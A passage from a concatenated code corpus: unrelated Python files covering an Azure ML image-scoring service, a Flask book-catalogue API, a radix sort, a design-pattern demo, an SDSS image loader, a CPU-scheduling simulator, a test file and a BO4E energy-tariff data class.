    layout = "FORMAT_NCHW"
    if c == 1:
        sample_img = img.convert("L")
    else:
        sample_img = img.convert("RGB")

    resized_img = sample_img.resize((w, h), Image.BILINEAR)
    resized = np.array(resized_img)
    if resized.ndim == 2:
        # single-channel image: add a trailing channel axis
        resized = resized[:, :, np.newaxis]

    typed = resized.astype(np.float32)

    if scaling == "INCEPTION":
        scaled = (typed / 128) - 1
    elif scaling == "VGG":
        # Bug fix: the original referenced the undefined name ``npdtype``
        # here (its definition was commented out above), so any call with
        # scaling == 'VGG' raised NameError.  float32 matches ``typed``.
        if c == 1:
            scaled = typed - np.asarray((128,), dtype=np.float32)
        else:
            scaled = typed - np.asarray((123, 117, 104), dtype=np.float32)
    else:
        scaled = typed

    # Swap to CHW if necessary.  Channels are assumed RGB: the model
    # configuration provides no other ordering information.
    if layout == "FORMAT_NCHW":
        ordered = np.transpose(scaled, (2, 0, 1))
    else:
        ordered = scaled

    return ordered
def postprocess(output_array):
    """Map the raw model output to an '<index> : <label>' string using the
    global ``label_dict`` populated by :func:`init`."""
    scores = output_array[0]
    best = np.argmax(scores)
    return f"{best} : {label_dict[best]}"
def init():
    """Scoring-service start-up hook: load the Triton session and labels.

    Populates the module-level globals ``session`` (inference session for
    the densenet_onnx model) and ``label_dict`` (class index -> label name,
    read from the model's labels file under AZUREML_MODEL_DIR).
    """
    global session, label_dict
    session = InferenceSession(path_or_bytes="densenet_onnx")

    model_dir = os.path.join(os.environ["AZUREML_MODEL_DIR"], "models")
    # NOTE(review): folder_path is computed but never used.
    folder_path = os.path.join(model_dir, "triton", "densenet_onnx")
    label_path = os.path.join(
        model_dir, "triton", "densenet_onnx", "densenet_labels.txt"
    )
    # NOTE(review): the file handle is never closed; harmless for a
    # once-per-process init, but a 'with' block would be cleaner.
    label_file = open(label_path, "r")
    labels = label_file.read().split("\n")
    label_dict = dict(enumerate(labels))
@rawhttp
async def run(request):
    """This function is called every time your webservice receives a request.

    Notice you need to know the names and data types of the model inputs and
    outputs. You can get these values by reading the model configuration file
    or by querying the model metadata endpoint.

    POST: the raw request body is decoded as an image, preprocessed with
    INCEPTION scaling, scored through the global ``session`` and the
    predicted label returned with HTTP 200.  Any other method returns 500.
    """
    if request.method == "POST":
        outputs = []
        for output in session.get_outputs():
            outputs.append(output.name)

        input_name = session.get_inputs()[0].name

        reqBody = await request.get_data()
        img = Image.open(io.BytesIO(reqBody))
        image_data = preprocess(img, scaling="INCEPTION")
        res = session.run(outputs, {input_name: image_data})

        result = postprocess(output_array=res)

        return AMLResponse(result, 200)
    else:
        # NOTE(review): 500 is an odd status for a disallowed method
        # (405 would be conventional); kept as-is to preserve behavior.
        return AMLResponse("bad request", 500)
| 2.28125 | 2 |
visualize_predictions_graph.py | jmhessel/multi-retrieval | 28 | 12770768 | '''
for i in predictions/test/*; do python visualize_predictions.py $i\/doc.json $i/pred_weights.npy prediction_dir/$i ; done;
'''
import argparse
import numpy as np
import bipartite_utils
import json
import os
import subprocess
import matplotlib.pyplot as plt
from sklearn.metrics import roc_auc_score
def parse_args():
    """Parse command-line arguments for the visualization script."""
    parser = argparse.ArgumentParser()
    parser.add_argument('document')
    parser.add_argument('predictions')
    parser.add_argument('output')
    # BUG FIX: type=int is required — without it argparse hands back a
    # *string* whenever the flag is supplied on the command line, and the
    # later range()/slice operations on n_to_show would crash.
    parser.add_argument('--n_to_show', type=int, default=5)
    return parser.parse_args()
def call(x):
    """Run the command string *x* through the shell.

    NOTE(review): shell=True executes the string via the shell; this is only
    safe because callers build the command from local, trusted paths.
    """
    subprocess.call(x, shell=True)
def main():
    """Render a bipartite sentence-to-image matching graph for one document.

    Loads the predicted adjacency matrix and the document annotations,
    computes AUC against ground truth, selects the top matched pairs, and
    writes the figure plus supporting text files to the output directory.
    """
    args = parse_args()
    pred_adj = np.load(args.predictions)
    with open(args.document) as f:
        data = json.loads(f.read())

    images, text = data[0], data[1]

    # Hungarian assignment between sentences (rows) and images (columns).
    solve_fn = bipartite_utils.generate_fast_hungarian_solving_function()
    sol = solve_fn(pred_adj, args.n_to_show)
    scores = pred_adj[sol[:,0], sol[:,1]]

    # Ground-truth adjacency: 1 wherever annotations link a sentence and an
    # image; -1 in the annotations means "no link".
    true_adj = np.zeros((len(text), len(images)))
    for text_idx, t in enumerate(text):
        if t[1] == -1: continue
        true_adj[text_idx, t[1]] = 1

    for image_idx, t in enumerate(images):
        if t[1] == -1: continue
        true_adj[t[1], image_idx] = 1

    auc = 100 * roc_auc_score(true_adj.flatten(),
                              pred_adj.flatten())
    print('AUC: {:.2f} {}'.format(auc,
                                  data[-1]))

    # Keep the n_to_show matched pairs with the highest predicted score.
    ordered_images, ordered_sentences = [], []
    for img_idx, sent_idx, sc in sorted(
            zip(sol[:,1], sol[:,0], scores), key=lambda x:-x[-1])[:args.n_to_show]:
        ordered_images.append(img_idx)
        ordered_sentences.append(sent_idx)
        print(sc)

    pred_adj_subgraph = pred_adj[np.array(ordered_sentences),:][:,np.array(ordered_images)]
    true_adj_subgraph = true_adj[np.array(ordered_sentences),:][:,np.array(ordered_images)]

    selected_images = [images[img_idx][0] for img_idx in ordered_images]
    selected_sentences = [text[sent_idx][0] for sent_idx in ordered_sentences]

    # normalize predicted sims to have max 1 and min 0
    # first, clip out negative values
    pred_adj_subgraph = np.clip(pred_adj_subgraph, 0, 1.0)
    pred_adj_subgraph -= np.min(pred_adj_subgraph.flatten())
    pred_adj_subgraph /= np.max(pred_adj_subgraph.flatten())

    assert np.min(pred_adj_subgraph.flatten()) == 0.0
    assert np.max(pred_adj_subgraph.flatten()) == 1.0

    print(pred_adj_subgraph.shape)
    print(ordered_images)
    print(ordered_sentences)
    print(selected_images)
    print(selected_sentences)

    # each line has ((x1, y1, x2, y2), strength, correctness)
    # images go above text
    lines_to_plot = []
    image_text_gap = 2
    same_mode_gap = 2
    offdiag_alpha_mul = .5

    def cosine_to_width(cos, exp=2.0, maxwidth=8.0):
        return cos**exp * maxwidth

    def cosine_to_alpha(cos, exp=1/2., maxalpha=1.0):
        return cos**exp * maxalpha

    # Green = correct match, purple = incorrect match.
    correct_color, incorrect_color = '#1b7837', '#762a83'

    lines_to_plot = []
    for text_idx in range(args.n_to_show):
        for image_idx in range(args.n_to_show):
            coords = (text_idx*same_mode_gap, 0, image_idx*same_mode_gap, image_text_gap)
            strength = max(pred_adj_subgraph[text_idx, image_idx], 0)
            correctness = true_adj_subgraph[text_idx, image_idx] == 1
            lines_to_plot.append((coords, strength, correctness))

    plt.figure(figsize=(args.n_to_show*same_mode_gap, image_text_gap))

    # Draw off-diagonal (cross) edges first, weakest first, so that the
    # matched-pair edges drawn below render on top.
    for (x1, y1, x2, y2), strength, correct in sorted(lines_to_plot,
                                                      key=lambda x: x[1]):
        if x1 == x2: continue
        plt.plot([x1, x2], [y1, y2],
                 linewidth=cosine_to_width(strength),
                 alpha=cosine_to_alpha(strength) * offdiag_alpha_mul,
                 color=correct_color if correct else incorrect_color)

    for (x1, y1, x2, y2), strength, correct in sorted(lines_to_plot,
                                                      key=lambda x: x[1]):
        if x1 != x2: continue
        plt.plot([x1, x2], [y1, y2],
                 linewidth=cosine_to_width(strength),
                 color=correct_color if correct else incorrect_color)

    plt.axis('off')
    plt.tight_layout()
    if not os.path.exists(args.output):
        os.makedirs(args.output)

    with open(args.output + '/sentences.txt', 'w') as f:
        f.write('\n'.join([' '.join(s.split()) for s in selected_sentences]))
    with open(args.output + '/images.txt', 'w') as f:
        f.write('\n'.join(selected_images))
    with open(args.output + '/all_sentences.txt', 'w') as f:
        f.write('\n'.join([' '.join(s[0].split()) for s in text]))
    with open(args.output + '/all_images.txt', 'w') as f:
        f.write('\n'.join([x[0] for x in images]))
    with open(args.output + '/auc.txt', 'w') as f:
        f.write('{:.4f}'.format(auc))

    plt.savefig(args.output + '/graph.png', dpi=300)
    # ImageMagick trims the whitespace border off the saved figure.
    call('convert {} -trim {}'.format(args.output + '/graph.png',
                                      args.output + '/graph_cropped.png'))
# Script entry point.
if __name__ == '__main__':
    main()
| 2.28125 | 2 |
app.py | EmmanuelleAD/api_livres_categories_iai | 0 | 12770769 | <filename>app.py
import os
from flask import Flask,abort,jsonify,request
from flask_sqlalchemy import SQLAlchemy
from dotenv import load_dotenv
from datetime import datetime
# Read DB credentials from the environment (.env) and configure the app.
load_dotenv()
username=os.getenv('user')
mdp=os.getenv('pswd')
host=os.getenv('host')

app=Flask(__name__)
# BUG FIX: the original URI template was 'postgresql://{}:{}@:5432/bdlivre'
# — it had no placeholder for the host, so the third .format() argument
# (host) was silently dropped and the URI always pointed at an empty host.
app.config['SQLALCHEMY_DATABASE_URI']='postgresql://{}:{}@{}:5432/bdlivre'.format(username,mdp,host)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS']=False

db=SQLAlchemy(app)
class Categorie(db.Model):
    """ORM model for a book category (table ``categories``)."""
    __tablename__='categories'
    id=db.Column(db.Integer,primary_key=True)
    libelle_categorie=db.Column(db.String(128),nullable=False)
    # One-to-many: a category owns its books (see Livre.categorie_id).
    livres=db.relationship('Livre',backref='categories',lazy=True)

    def __init__(self,libelle_categorie):
        self.libelle_categorie=libelle_categorie

    def inserer_categorie(self):
        """Persist this category (INSERT + COMMIT)."""
        db.session.add(self)
        db.session.commit()

    def modifier_categorie(self):
        """Commit pending attribute changes (UPDATE)."""
        db.session.commit()

    def supprimer_categorie(self):
        """Delete this category (DELETE + COMMIT)."""
        db.session.delete(self)
        db.session.commit()

    def categorie_format(self):
        """Return a JSON-serializable dict view of the category."""
        return({
            'id':self.id,
            'categorie':self.libelle_categorie
        })
class Livre(db.Model):
    """ORM model for a book (table ``livres``), linked to one Categorie."""
    __tablename__='livres'
    id=db.Column(db.Integer,primary_key=True)
    # ISBN may be NULL but must be unique when present.
    isbn=db.Column(db.String(20),unique=True)
    titre=db.Column(db.String(60),nullable=False)
    date_publication=db.Column(db.DateTime)
    auteur=db.Column(db.String(100),nullable=False)
    editeur=db.Column(db.String(100),nullable=False)
    categorie_id=db.Column(db.Integer,db.ForeignKey('categories.id'),nullable=False)

    def __init__(self,isbn,titre,date_publication,auteur,editeur,categorie_id):
        self.isbn=isbn
        self.titre=titre
        self.date_publication=date_publication
        self.auteur=auteur
        self.editeur=editeur
        self.categorie_id=categorie_id

    def inserer_livre(self):
        """Persist this book (INSERT + COMMIT)."""
        db.session.add(self)
        db.session.commit()

    def modifier_livre(self):
        """Commit pending attribute changes (UPDATE)."""
        db.session.commit()

    def supprimer_livre(self):
        """Delete this book (DELETE + COMMIT)."""
        db.session.delete(self)
        db.session.commit()

    def livre_format(self):
        """Return a JSON-serializable dict view of the book."""
        return({
            'id':self.id,
            'isbn':self.isbn,
            'titre':self.titre,
            'date': self.date_publication,
            'auteur':self.auteur,
            'editeur':self.editeur,
            'categorie':self.categorie_id
        })
db.create_all()
###Lister tous les livres
@app.route('/livres',methods=['GET'])
def get_all_books():
    """Return every book plus the total count.

    NOTE(review): the response key is 'succes' (sic) — kept for
    backward compatibility with existing clients.
    """
    livres=Livre.query.all()
    liv_format=[l.livre_format() for l in livres]
    return jsonify({
        'succes':True,
        'livres':liv_format,
        # len() of the already-fetched list avoids a second COUNT query
        # (same value the original computed with Livre.query.count()).
        'total':len(liv_format)
    })
###Chercher un livre avec son id
@app.route('/livres/<int:id>',methods=['GET'])
def get_one_book(id):
    """Return one book by primary key; 404 when it does not exist.

    BUG FIX: the original wrapped abort(404) in a bare try/except that
    re-raised everything as 400 — abort() raises an HTTPException, so the
    intended 404 never reached the client. The abort must stay outside any
    blanket handler.
    """
    livre = Livre.query.get(id)
    if livre is None:
        abort(404)
    return jsonify({
        'success': True,
        'livre demandé ': livre.livre_format()
    })
###La liste des livres d'une categorie
@app.route('/categories/<int:id>/livres',methods=['GET'])
def one_category_books(id):
    """List the books of one category; 404 when the category is unknown.

    BUG FIX: filter_by() returns a Query and is never None, so the original
    None check was dead; an unknown id instead crashed on
    Categorie.query.get(id).libelle_categorie and surfaced as 400.
    Also keeps abort(404) out of the bare try/except that swallowed it.
    """
    categorie = Categorie.query.get(id)
    if categorie is None:
        abort(404)
    livres_cat = Livre.query.filter_by(categorie_id=id)
    livres_cat_format = [l.livre_format() for l in livres_cat]
    return jsonify({
        'Categorie_id': id,
        'Nom categorie': categorie.libelle_categorie,
        'Livres': livres_cat_format,
        'Total_livre_categorie': livres_cat.count()
    })
##Lister une categorie
@app.route('/categories/<int:id>',methods=['GET'])
def get_one_category(id):
    """Return one category by primary key; 404 when it does not exist.

    BUG FIX: abort() raises an HTTPException; the original's bare
    try/except converted every intended 404 into a 400.
    """
    categorie = Categorie.query.get(id)
    if categorie is None:
        abort(404)
    return jsonify({
        'Success': True,
        'Categorie': categorie.categorie_format(),
    })
##Chercher une categorie par son id
"""
@app.route('/categories/<int:id>',methods=['GET'])
def search_one_categories(id):
try:
categorie=Categorie.query.get(id)
if categorie is None:
resultat=jsonify({
'Success':False,
'Resultat':'categorie inexistante!!'
})
else:
resultat= jsonify({
'Success':"True la catégorie existe",
'Categorie':categorie.categorie_format,
})
return resultat
except:
abort(400)
"""
#Lister toutes les catégories
@app.route('/categories',methods=['GET'])
def get_all_categories():
    """Return every category plus the total count."""
    # .all() returns a list (possibly empty), never None — the original's
    # `if categories is None: abort(404)` branch was unreachable dead code.
    categories = Categorie.query.all()
    categories_format = [c.categorie_format() for c in categories]
    return jsonify({
        'Success': True,
        'Categories': categories_format,
        'Total': Categorie.query.count()
    })
##Supprimer un livre
@app.route('/livres/<int:id>',methods=['DELETE'])
def delete_one_book(id):
    """Delete one book; 404 when absent, 422 when the delete itself fails.

    BUG FIX: abort(404) was inside the try whose bare except re-raised 422,
    so a missing book was wrongly reported as unprocessable.
    """
    livre_a_supprimer = Livre.query.get(id)
    if livre_a_supprimer is None:
        abort(404)
    try:
        livre_a_supprimer.supprimer_livre()
    except Exception:
        abort(422)
    return jsonify({'Success':True,
                    'Livre supprimé': livre_a_supprimer.livre_format(),
                    'Total livres':Livre.query.count()
                    })
#Supprimer une categorie
@app.route('/categories/<int:id>',methods=['DELETE'])
def delete_one_categories(id):
    """Delete one category; 404 when absent, 400 when the delete fails.

    BUG FIX: abort(404) was inside the try whose bare except re-raised 400,
    so a missing category never produced the intended 404.
    """
    categorie = Categorie.query.get(id)
    if categorie is None:
        abort(404)
    try:
        categorie.supprimer_categorie()
    except Exception:
        abort(400)
    return jsonify({
        'Success': True,
        'Categorie supprimé': categorie.categorie_format(),
        'Total': Categorie.query.count()
    })
#Modifier les informations d'un livre
@app.route('/livres/<int:id>',methods=['PATCH'])
def update_one_book(id):
    """Replace every field of a book; 404 when absent, 400 on missing fields.

    BUG FIX: the original never checked whether the book exists, so an
    unknown id dereferenced None and crashed with an unhandled 500.
    """
    donnee = request.get_json()
    livre = Livre.query.get(id)
    if livre is None:
        abort(404)
    livre.isbn = donnee.get("isbn", None)
    livre.titre = donnee.get("titre", None)
    livre.auteur = donnee.get("auteur", None)
    livre.editeur = donnee.get("editeur", None)
    livre.date_publication = donnee.get("date", None)
    livre.categorie_id = donnee.get("categorie", None)
    # All fields are required (despite the PATCH verb) — reject partial
    # payloads before committing, as the original did.
    if livre.isbn is None or livre.titre is None or livre.auteur is None or livre.editeur is None or livre.date_publication is None or livre.categorie_id is None:
        abort(400)
    livre.modifier_livre()
    return jsonify({
        "success": True,
        "Livre modifie": livre.livre_format()
    })
@app.route('/categories/<int:id>',methods=['PATCH'])
def update_one_category(id):
    """Rename a category; 404 when absent, 400 when 'categorie' is missing.

    BUG FIX: the original never checked whether the category exists, so an
    unknown id dereferenced None (AttributeError → HTTP 500).
    """
    donnee = request.get_json()
    categorie = Categorie.query.get(id)
    if categorie is None:
        abort(404)
    categorie.libelle_categorie = donnee.get("categorie", None)
    if categorie.libelle_categorie is None:
        abort(400)
    categorie.modifier_categorie()
    return jsonify({"success": True,
                    "Categorie modifie": categorie.categorie_format()
                    })
@app.route('/livres',methods=['POST'])
def create_book():
    """Create a book from the JSON payload; 400 when a NOT NULL field is missing."""
    donnees = request.get_json()
    isbn = donnees.get("isbn", None)
    titre = donnees.get("titre", None)
    date = donnees.get("date", None)
    auteur = donnees.get('auteur', None)
    editeur = donnees.get("editeur", None)
    cat = donnees.get("categorie", None)
    # Validate up front: titre/auteur/editeur/categorie_id are NOT NULL
    # columns, so inserting missing fields used to surface as an opaque
    # database error (HTTP 500). isbn and date are nullable.
    if None in (titre, auteur, editeur, cat):
        abort(400)
    livre = Livre(isbn=isbn, titre=titre, date_publication=date, auteur=auteur, editeur=editeur, categorie_id=cat)
    livre.inserer_livre()
    return jsonify({
        "success": True,
        "Nouveau livre ": livre.livre_format(),
        "Total": Livre.query.count()
    })
@app.route('/categories',methods=['POST'])
def add_categories():
    """Create a category; 400 when the 'libelle_categorie' field is missing.

    BUG FIX: the original answered 404 (resource not found) for a missing
    body field; that is a client/request error, i.e. 400.
    """
    donnees = request.get_json()
    lib = donnees.get("libelle_categorie", None)
    if lib is None:
        abort(400)
    cat = Categorie(libelle_categorie=lib)
    cat.inserer_categorie()
    return jsonify({
        "success": True,
        "Categorie cree": cat.categorie_format()
    })
@app.errorhandler(404)
def not_found(error):
    """JSON body for 404 responses (resource does not exist)."""
    return jsonify({'success':False,'error': 404,'message': 'not found'}),404
@app.errorhandler(400)
def server_error(error):
    """JSON body for 400 responses.

    NOTE(review): the name says "server_error" but this handles 400 Bad
    Request, a client error — consider renaming.
    """
    return jsonify({'success':False,'error': 400,'message': 'bad request'}),400
# Run the development server when executed directly (not under a WSGI host).
if __name__=='__main__':
    app.run(debug=True)
| 2.5 | 2 |
code/radix_sort.py | mrtryhard/SortingsBenchmarkPython | 0 | 12770770 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import math
# Radix sort (tri par base) for non-negative integers.
# lst: the list to sort
# max_len: maximum number of decimal digits of any value (default 10)
def tri_par_base(lst, max_len = 10):
    """Return a new list with the values of *lst* sorted (LSD radix sort).

    Only non-negative integers are supported. Values with more than
    *max_len* decimal digits are not fully sorted.
    """
    # Decimal digits: one bucket per digit value 0-9.
    NB_BUCKETS = 10
    for x in range(max_len):
        # Reset the buckets for this digit position.
        buckets = [[] for i in range(NB_BUCKETS)]
        divisor = 10 ** x
        # Distribute each value into the bucket of its x-th digit.
        for y in lst:
            # BUG FIX: the original used float division math.floor((y / 10**x) % 10),
            # which silently corrupts digits for integers above 2**53;
            # integer // arithmetic is exact for any size.
            buckets[(y // divisor) % NB_BUCKETS].append(y)
        # Flatten the buckets back into a single list (stable order).
        lst = []
        for section in buckets:
            lst.extend(section)
    return lst
# CLI entry point: sort the integers passed as command-line arguments.
if __name__ == '__main__':
    if len(sys.argv) == 1:
        print("Requires list.")
    else:
        list_of_integers = [int(i) for i in sys.argv[1:]]
        lst = tri_par_base(list_of_integers)
        print("Sorted List: ")
        print(lst)
    print("Radix sort end.")
structural/facade.py | zhengxiaowai/python-javascript-design-patterns | 6 | 12770771 | <reponame>zhengxiaowai/python-javascript-design-patterns
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
class HardWare(object):
    """Hardware subsystem of the facade demo (power and bootloader steps)."""
    def power_on(self):
        print('上电')

    def bootloader(self):
        print('bootloader 启动')

    def power_off(self):
        print('断电')
class OperatingSystem(object):
    """Operating-system subsystem: kernel/image load and shutdown."""
    def load_kernel(self):
        print('加载内核')

    def load_image(self):
        print('加载镜像')

    def exit_os(self):
        print('退出操作系统')
class SoftWare(object):
    """Application subsystem: start and stop user applications."""
    def load_app(self):
        print('加载应用程序')

    def exit_app(self):
        print('退出应用程序')
class Computer(object):
    """Facade: hides the boot/shutdown orchestration of the subsystems."""

    def __init__(self):
        self.hw = HardWare()
        self.os = OperatingSystem()
        self.sw = SoftWare()

    def boot(self):
        """Bring the machine up: hardware, then OS, then applications."""
        for step in (self.hw.power_on, self.hw.bootloader,
                     self.os.load_kernel, self.os.load_image,
                     self.sw.load_app):
            step()

    def shut_down(self):
        """Tear the machine down in reverse: applications, OS, hardware."""
        for step in (self.sw.exit_app, self.os.exit_os, self.hw.power_off):
            step()
# Demo: the client only talks to the Computer facade, never the subsystems.
if __name__ == '__main__':
    computer = Computer()
    print('开机')
    computer.boot()
    print('\n关机')
    computer.shut_down()
| 3.171875 | 3 |
bin/get_tractor_images.py | UnofficialJuliaMirrorSnapshots/SloanDigitalSkySurvey.jl-d2185075-3040-5c42-a634-a12f38dbd79b | 0 | 12770772 | #!/usr/bin/python
#
# Load a processed image from the tractor. Note that as of writing,
# the masking was incorrect.
# https://github.com/dstndstn/tractor
from tractor.sdss import *
import argparse
import numpy
import copy
# Parse which SDSS run/camcol/field/band to fetch. (Python 2 script.)
parser = argparse.ArgumentParser()
parser.add_argument('--run', type=int, help='The run number.', default=3900)
parser.add_argument('--camcol', type=int, help='The camcol number.', default=6)
parser.add_argument('--field', type=int, help='The field number.', default=269)
parser.add_argument('--band', type=int, help='The band (a number from 0 to 4).', default=3)
parser.add_argument('--destination_base', type=str,
                    help=('Output will be written to files like '
                          '<destination_base>_<run>_<camcol>_<field>_<description>.csv'),
                    default="/tmp/test")
args = parser.parse_args()

# SDSS photometric band letters, indexed by --band.
bands = ['u', 'g', 'r', 'i', 'z']
bandname = bands[args.band]

# Note that get_tractor_image_dr9 just calls get_tractor_image_dr8
img = get_tractor_image_dr8(args.run, args.camcol, args.field, bandname, nanomaggies=True)
sources = get_tractor_sources_dr9(args.run, args.camcol, args.field,
                                  nanomaggies=True, fixedComposites=True, useObjcType=True)

# Dump the raw image and the PSF as CSV; band_str is 1-indexed for the consumer.
file_base = args.destination_base + ('_%d_%d_%d_' % (args.run, args.camcol, args.field))
band_str = '%d_' % (args.band + 1) # Python uses 0 indexing
numpy.savetxt(file_base + band_str + "img.csv", img[0].data, delimiter=",")
numpy.savetxt(file_base + band_str + "psf.csv", img[0].psf, delimiter=",")

sdss = DR8()

# Mask the image. Note that as of now, the
masked_img_data = copy.deepcopy(img[0].data)
fpM = sdss.readFpM(args.run, args.camcol, args.field, bandname)
# NOTE(review): NaN is not a Python builtin; it is presumably brought into
# scope by `from tractor.sdss import *` — confirm, otherwise this raises
# NameError at runtime.
for plane in [ 'INTERP', 'SATUR', 'CR', 'GHOST' ]:
    fpM.setMaskedPixels(plane, masked_img_data, NaN)
print sum(numpy.isnan(masked_img_data))
numpy.savetxt(file_base + band_str + "masked_img.csv", masked_img_data, delimiter=",")

# Debugging the mask:
if False:
    size(fpM.getMaskPlane('INTERP').rmin) # INTERP is element 1 in the 0-indexed python.
    name = 'INTERP'
    masked_img_data = copy.deepcopy(img[0].data)
    val = NaN
    M = fpM.getMaskPlane(name)
    nan_pixels = 0
    for (c0,c1,r0,r1,coff,roff) in zip(M.cmin,M.cmax,M.rmin,M.rmax,
                                       M.col0, M.row0):
        assert(coff == 0)
        assert(roff == 0)
        nan_pixels = nan_pixels + (r1 - r0 + 1) * (c1 - c0 + 1)
        masked_img_data[r0:r1, c0:c1] = val
    print nan_pixels
    print sum(numpy.isnan(masked_img_data))
| 2.484375 | 2 |
simulation.py | thiagogvasc/CPU_Scheduler_Simulator | 1 | 12770773 | from process import Process
from process import State
class Simulation:
    """Drives the CPU-scheduling simulation tick by tick and reports metrics.

    Collaborators: *cpu* exposes currentProcess/contextSwitch, *scheduling*
    exposes addProcess/update/printQueues, and each Process tracks its own
    state and burst data.
    """

    def __init__(self, data, cpu, scheduling):
        self.data = data
        self.cpu = cpu
        self.scheduling = scheduling
        self.processes = []
        # Instantiate all processes up front: they all arrive at t = 0.
        for i, processSimulationData in enumerate(data):
            process = Process(i + 1, processSimulationData)
            self.scheduling.addProcess(process)
            self.processes.append(process)
        self.time = 0
        self.totalRunningTime = 0

    def terminated(self):
        """Return True once every process has reached State.TERMINATED."""
        for process in self.processes:
            if process.state != State.TERMINATED:
                return False
        return True

    def run(self):
        """Main simulation loop; prints per-tick state and final averages."""
        while not self.terminated():
            # Update process state
            for process in self.processes:
                process.update()
            # Update scheduling state
            self.scheduling.update()

            # Print a snapshot only at context switches (and at the end).
            if (self.cpu.contextSwitch or self.terminated()):
                print('Time: ' + str(self.time))
                print('{:20}'.format('Process ID'), end='')
                print('{:20}'.format('Burst Type'), end='')
                print('{:20}'.format('Burst TIme'), end='')
                print('{:20}'.format('Remaining Time'), end='')
                print('{:20}'.format('State'), end='')
                print()
                for process in self.processes:
                    process.print()
                self.cpu.contextSwitch = False
                self.scheduling.printQueues()
                print('----------------------------------------------------------------------------------------------')

            # Accumulate per-process metrics for this tick.
            for process in self.processes:
                # Waiting time: ticks spent in the ready queue.
                if process.state == State.READY:
                    process.totalWaitingTime += 1
                # Turnaround time: ticks until termination.
                if process.state != State.TERMINATED:
                    process.turnaroundTime += 1
                # Response time: ticks from arrival to first READY transition.
                if process.previousState == State.NEW and process.state == State.READY:
                    process.responseTime += 1

            # Total running time: ticks during which the CPU executed a process.
            if self.cpu.currentProcess:
                if self.cpu.currentProcess.state == State.RUNNING:
                    self.totalRunningTime += 1

            self.time += 1

        # Compute and print the results after the simulation has finished.
        print('Results:')
        waitingTimeSum = 0
        turnaroundTimeSum = 0
        responseTimeSum = 0
        # BUG FIX: the averages below divided by a hard-coded 8; use the
        # actual number of simulated processes so other workloads report
        # correct averages (identical result for 8-process input).
        numProcesses = len(self.processes)
        print('{:20}'.format('Process ID'), end='')
        print('{:20}'.format('Tw (Waiting)'), end='')
        print('{:20}'.format('Ttr (Turnaround)'), end='')
        print('{:20}'.format('Tr (Response)'), end='')
        print()
        for process in self.processes:
            print('{:20}'.format('P' + str(process.pid)), end='')
            print('{:20}'.format(str(process.totalWaitingTime)), end='')
            print('{:20}'.format(str(process.turnaroundTime)), end='')
            print('{:20}'.format(str(process.responseTime)), end='')
            print()
            waitingTimeSum += process.totalWaitingTime
            turnaroundTimeSum += process.turnaroundTime
            responseTimeSum += process.responseTime
        print('{:20}'.format('Average'), end='')
        print('{:20}'.format(str(waitingTimeSum / numProcesses)), end='')
        print('{:20}'.format(str(turnaroundTimeSum / numProcesses)), end='')
        print('{:20}'.format(str(responseTimeSum / numProcesses)), end='')
        print()
        print()
        print('CPU Utilization: ', end='')
        # NOTE(review): elapsed time is taken as (self.time - 1); confirm the
        # final idle tick is intentionally excluded from utilization.
        print(self.totalRunningTime/(self.time - 1) * 100)
        print('Total time to finish all processes: ', end='')
        print(self.time - 1 )
lungs_ml/lungs_ml/visualization_service/__init__.py | dumaevrinat/lung_diseases | 3 | 12770774 | <reponame>dumaevrinat/lung_diseases<gh_stars>1-10
from .visualization_service import VisualizationService
| 1.03125 | 1 |
concat/tests/level1/test_execute.py | jmanuel1/concat | 5 | 12770775 | import concat.level1.execute
import unittest
import ast
from typing import Dict
class TestExecute(unittest.TestCase):
    """Tests for concat.level1.execute.execute and its preamble."""

    # Names the level-1 preamble is expected to inject into the globals dict.
    names = ['to_int', 'to_bool', 'to_complex', 'len', 'getitem', 'to_float',
             'decode_bytes', 'to_tuple', 'to_bytes', 'to_list', 'to_bytearray',
             'to_set', 'add_to_set', 'to_frozenset', 'to_dict',
             'user_defined_function', 'method', 'with_async', 'for_async',
             'coroutine', 'math', 'import_module', 'import_advanced',
             'custom_class', 'instance', 'open', 'popen', 'fdopen', 'curry',
             'call', 'drop', 'drop_2', 'drop_3', 'nip', 'nip_2', 'dup',
             'dup_2', 'swap', 'dup_3', 'over', 'over_2', 'pick', 'to_slice',
             'choose', 'if_then', 'if_not', 'case', 'loop']

    def setUp(self) -> None:
        # No shared fixtures needed; kept only as an explicit no-op.
        pass

    def test_execute_function(self) -> None:
        """execute() accepts an empty module without raising."""
        module = ast.Module(body=[])
        concat.level1.execute.execute('<test>', module, {})
        # we passed if we get here

    def test_preamble(self) -> None:
        """Test that the preamble adds correct names to the globals dict."""
        module = ast.Module(body=[])
        globals: Dict[str, object] = {}
        concat.level1.execute.execute('<test>', module, globals)
        for name in self.names:
            with self.subTest(msg='presence of "{}"'.format(name), name=name):
                message = 'preamble did not add "{}"'.format(name)
                self.assertIn(name, globals, msg=message)
| 2.53125 | 3 |
src/bo4e/com/tarifpreispositionproort.py | bo4e/BO4E-python | 1 | 12770776 | """
Contains TarifpreispositionProOrt class
and corresponding marshmallow schema for de-/serialization
"""
from typing import List
import attr
from marshmallow import fields
from bo4e.com.com import COM, COMSchema
from bo4e.com.tarifpreisstaffelproort import TarifpreisstaffelProOrt, TarifpreisstaffelProOrtSchema
from bo4e.validators import check_list_length_at_least_one
# pylint: disable=too-few-public-methods
@attr.s(auto_attribs=True, kw_only=True)
class TarifpreispositionProOrt(COM):
    """
    This component models tariff prices of various types ("Tarifpreise").

    .. HINT::
        `TarifpreispositionProOrt JSON Schema <https://json-schema.app/view/%23?url=https://raw.githubusercontent.com/Hochfrequenz/BO4E-python/main/json_schemas/com/TarifpreispositionProOrtSchema.json>`_

    """

    # required attributes
    #: Postal code of the town/city the price applies to (exactly 5 digits)
    postleitzahl: str = attr.ib(validator=attr.validators.matches_re(r"^\d{5}$"))
    #: Town/city the price applies to
    ort: str = attr.ib(validator=attr.validators.instance_of(str))
    #: ene't grid number of the grid in which the price applies
    netznr: str = attr.ib(validator=attr.validators.instance_of(str))
    # The price tiers ("Preisstaffeln") with their price data; at least one entry required
    preisstaffeln: List[TarifpreisstaffelProOrt] = attr.ib(
        validator=[
            attr.validators.deep_iterable(
                member_validator=attr.validators.instance_of(TarifpreisstaffelProOrt),
                iterable_validator=check_list_length_at_least_one,
            ),
        ]
    )

    # there are no optional attributes
# there are no optional attributes
class TarifpreispositionProOrtSchema(COMSchema):
    """
    Schema for de-/serialization of TarifpreispositionProOrt.
    """

    # Target class instantiated by the base schema on load
    class_name = TarifpreispositionProOrt

    # required attributes
